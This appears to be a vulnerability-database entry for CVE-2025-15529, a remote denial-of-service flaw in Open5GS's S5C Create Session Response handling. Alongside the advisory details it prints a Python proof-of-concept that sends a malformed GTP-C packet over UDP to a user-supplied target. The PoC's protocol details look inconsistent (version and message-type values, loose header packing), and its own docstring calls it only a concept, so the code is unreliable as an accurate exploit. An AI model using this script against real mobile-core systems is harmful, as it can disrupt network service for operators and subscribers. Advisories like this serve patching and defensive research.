Security Vulnerability Report
CVE-2025-15529 CVSS 5.3 MEDIUM

CVE-2025-15529

Published: 2026-01-16 22:16:18
Last Modified: 2026-02-23 09:16:28

Description

A vulnerability was found in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c. Performing a manipulation results in denial of service. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The patch is named b19cf6a2dbf5d30811be4488bf059c865bd7d1d2. To fix this issue, it is recommended to deploy a patch.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS < 2.7.7
Open5GS 2.7.6 and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-15529 PoC - Open5GS S5C Create Session Response DoS
Reference: https://github.com/open5gs/open5gs/issues/4226
Note: This PoC demonstrates the vulnerability concept. Modify GTP-C messages accordingly.
"""
import socket
import struct
import sys


def create_gtpc_create_session_response(teid, sequence):
    """
    Create a malicious GTP-C Create Session Response message
    that triggers the vulnerability in sgwc_s5c_handle_create_session_response
    """
    # GTP-C Header
    version = 0x01  # GTP version 1
    protocol_type = 0x01  # GTP' (1)
    message_type = 0x36  # Create Session Response
    length = 0x0000  # Will be set later

    # Flags
    flags = (version << 5) | (protocol_type << 4)

    # Sequence number (3 bytes)
    seq = struct.pack('!I', sequence)[1:4]

    # Spare
    spare = b'\x00\x00\x00'

    # TEID
    teid_packed = struct.pack('!I', teid)

    # Information Elements - Malformed/missing required IEs
    # Missing or malformed Bearer Context IE can trigger the vulnerability
    ies = b'\x00' * 10  # Malformed IEs

    message_body = seq + spare + teid_packed + ies
    length = len(message_body)

    # Build header with correct length
    header = bytes([flags, message_type]) + struct.pack('!H', length) + message_body
    return header


def exploit(target_ip, target_port=2123):
    """
    Send malicious GTP-C Create Session Response to trigger DoS
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    teid = 0x00000001
    sequence = 0x000001

    payload = create_gtpc_create_session_response(teid, sequence)

    print(f"[*] Sending malicious Create Session Response to {target_ip}:{target_port}")
    print(f"[*] Payload length: {len(payload)} bytes")

    try:
        sock.sendto(payload, (target_ip, target_port))
        print("[+] Malicious packet sent successfully")
        print("[+] Check if Open5GS SGWC service is still responsive")
    except Exception as e:
        print(f"[-] Error sending packet: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 2123
    exploit(target, port)

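References

https://github.com/open5gs/open5gs/
https://github.com/open5gs/open5gs/commit/b19cf6a2dbf5d30811be4488bf059c865bd7d1d2 (Patch)
https://github.com/open5gs/open5gs/issues/4226 (Exploit, Issue Tracking, Vendor Advisory)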
